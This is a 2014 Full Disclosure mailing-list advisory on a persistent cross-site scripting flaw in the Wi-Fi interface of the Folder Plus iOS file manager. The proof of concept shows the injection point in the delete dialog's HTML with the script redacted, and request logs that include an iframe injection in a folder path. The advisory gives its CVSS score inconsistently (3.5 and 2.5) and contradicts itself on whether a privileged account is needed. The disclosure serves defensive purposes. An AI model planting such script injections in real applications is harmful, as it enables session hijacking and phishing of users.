[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Folder Plus v2.5.1 iOS - Persistent Item Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-10-27 15:21:21
Message-ID: 544E62F1.7010309 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Folder Plus v2.5.1 iOS - Persistent Item Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1348
Release Date:
=============
2014-10-24
Vulnerability Laboratory ID (VL-ID):
====================================
1348
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
The ability to use multi touch to quickly move between viewing and editing files is also very \
good if you're willing to utilize it. - Touch Reviews. Folder Plus is an In-App Multitasking \
Capable File Manager/Viewer/Editor, with 3-Finger Swipes You Switch between Tasks of File \
Managing, Viewing, Editing, etc QUICKLY.
(Copy of the Vendor Homepage: http://theverygames.com/folder-plus/ & \
https://itunes.apple.com/us/app/file-manager-folder-plus/id484856077 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web \
vulnerability in the official The Very Games `Folder Plus` iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-10-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
The Very Games
Product: Folder Plus - iOS Mobile Web Application (Wifi) 2.5.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Folder Plus \
v2.5.1 iOS mobile application. The issue allows an attacker to inject own script code as \
payload to the application-side of the vulnerable service function or module.
The vulnerability is located in the delete item message context of the wifi interface listing \
module. The issue allows remote attackers to inject own persistent script codes by usage of \
the vulnerable create folder function. The attacker injects a script code payloads and waits \
for a higher privileged delete of the item to execute the script codes. The execution of the \
injected script code occurs in the delete message context to confirm to erase. The attack \
vector is persistent on the application-side and the request method to execute is GET. The \
issue allows to stream persistent malicious script codes to the front site wifi root path.
The security risk of the application-side web vulnerability is estimated as medium with a cvss \
(common vulnerability scoring system) count of 2.5. Exploitation of the application-side web \
vulnerability requires a low privileged web-application user account and low or medium user \
interaction. Successful exploitation of the vulnerabilities result in persistent phishing, \
session hijacking, persistent external redirect to malicious sources and application-side \
manipulation of affected or connected module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Wifi Sharing
Vulnerable Function(s):
[+] Delete Item
Vulnerable Parameter(s):
[+] items name
Affected Module(s):
[+] Wifi Interface - Root Index
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without \
privileged application user account and with low or medium user interaction. For security \
demonstration or to reproduce the issue follow the provided information and steps below to \
continue.
PoC: Folder Plus > THE VERY GAMES - Wifi UI Index
<tbody><tr style="height:32px"><td \
style="width:32px"></td><td>​​​​​</td><td \
style="width:32px"></td></tr> <tr style="height:66px" valign="top">
<td></td>
<td id="modal_body1" style="width:336px" align="left">Delete<div style="display: inline-block;" \
class="horz_padding"></div><img src="/?action=extra&path=icons/iconFolder.png" style="width: \
16px; height: 16px; vertical-align: text-top;"><div style="width: 4px;
display: inline-block;"></div> "><[PERSISTENT INJECTED SCRIPT CODE!]);"><div style="display: \
inline-block;" class="horz_padding"></div>?</td>​​​​​ <td></td>
</tr>
<tr style="height:32px" valign="middle">
<td></td>
<td id="modal_body2" align="right"><a href="#"
class="toolbar_button"><div style="display: inline-block;">Cancel</div></a><div style="width: \
16px; display: inline-block;"></div> <a href="#" class="toolbar_button"><img \
style="vertical-align: text-top; display: inline;" \
src="/?action=extra&path=images/delete1.png"> <img style="vertical-align: text-top; display: \
none;" src="/?action=extra&path=images/delete2.png"><div style="width: 4px; display: \
inline-block;"></div><div style="display: inline-block;">Delete</div></a></td> <td></td>
</tr>
<tr style="height:20px">
<td></td>
<td></td>
<td align="center" valign="middle">
<div id="modal_body3"></div>
</td>
</tr>
</tbody>
--- PoC Session Logs [POST] ---
Status: 200[OK]
GET http://localhost/?action=directory&path=%3Ciframe%20src%3Dhttp://www.vulnerability-lab.com%3E \
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[2] Mime Type[application/json] Request \
Header: Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Vary[Accept]
Content-Type[application/json]
Date[Tue, 21 Oct 2014 15:42:33 GMT]
Status: 200[OK]
GET http://localhost/?action=list Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[491] Mime \
Type[application/json] Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[491]
Vary[Accept]
Content-Type[application/json]
Date[Tue, 21 Oct 2014 15:42:34 GMT]
Status: 200[OK]
GET http://localhost/[PERSISTENT INJECTED SCRIPT CODE!] Load Flags[LOAD_DOCUMENT_URI ] Größe \
des Inhalts[0] Mime Type[application/x-unknown-content-type] Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Tue, 21 Oct 2014 15:42:36 GMT]
Reference(s):
http://localhost/?action=
http://localhost/?action=directory&path=
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction implementation and filter mechanism on \
new folder inputs. After the restriction the input needs to be encoded or parsed to prevent the \
persistent script code execution in the delete function.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the delete item \
function is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic